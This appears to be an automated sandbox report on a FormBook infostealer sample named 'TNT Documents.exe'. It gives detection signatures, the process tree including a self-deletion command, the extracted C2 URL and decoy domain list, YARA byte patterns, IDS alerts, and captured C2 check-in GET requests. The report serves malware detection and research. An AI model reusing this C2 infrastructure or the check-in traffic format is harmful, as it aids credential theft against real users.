
Windows Analysis Report TNT Documents.exe

Overview

General Information

Sample Name: TNT Documents.exe
Analysis ID: 532859
MD5: f943d9ee79559042bfff9b4e55270cfa
SHA1: 7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256: 2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
Tags: exe, Formbook, TNT

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TNT Documents.exe (PID: 4548 cmdline: "C:\Users\user\Desktop\TNT Documents.exe" MD5: F943D9EE79559042BFFF9B4E55270CFA)
    • TNT Documents.exe (PID: 6400 cmdline: {path} MD5: F943D9EE79559042BFFF9B4E55270CFA)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6268 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 1148 cmdline: /c del "C:\Users\user\Desktop\TNT Documents.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x6b18:$sqlite3text: 68 38 2A 90 C5
  • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.TNT Documents.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.2.TNT Documents.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.TNT Documents.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
7.0.TNT Documents.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.TNT Documents.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
Multi AV Scanner detection for submitted file
Source: TNT Documents.exe | ReversingLabs: Detection: 46%
Yara detected FormBook
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd | Avira URL Cloud: Label: malware
Source: http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd | Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: TNT Documents.exe | Joe Sandbox ML: detected
Source: 7.2.TNT Documents.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.0.TNT Documents.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: TNT Documents.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: TNT Documents.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe | Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe | Network Connect: 51.255.30.106 80
Source: C:\Windows\explorer.exe | Network Connect: 119.18.54.99 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe | Domain query: www.coached.info
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.floridanratraining.com/how6/
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: global traffic | HTTP traffic detected:
  GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1
  Host: www.cortepuroiberico.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1
  Host: www.specialtyplastics.online
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1
  Host: www.metronixmedical.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1
  Host: www.coached.info
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 209.17.116.163 209.17.116.163
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Server: openresty
  Date: Thu, 02 Dec 2021 17:59:48 GMT
  Content-Type: text/html
  Content-Length: 275
  ETag: "61a4f026-113"
  Via: 1.1 google
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.comx
Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designerss
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com=
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comF(
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comI.TTF
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comals
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comcomo?
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comd
Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comitud
Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comX
Source: TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.c
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnG
Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cna
Source: TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnaX
Source: TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnar
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
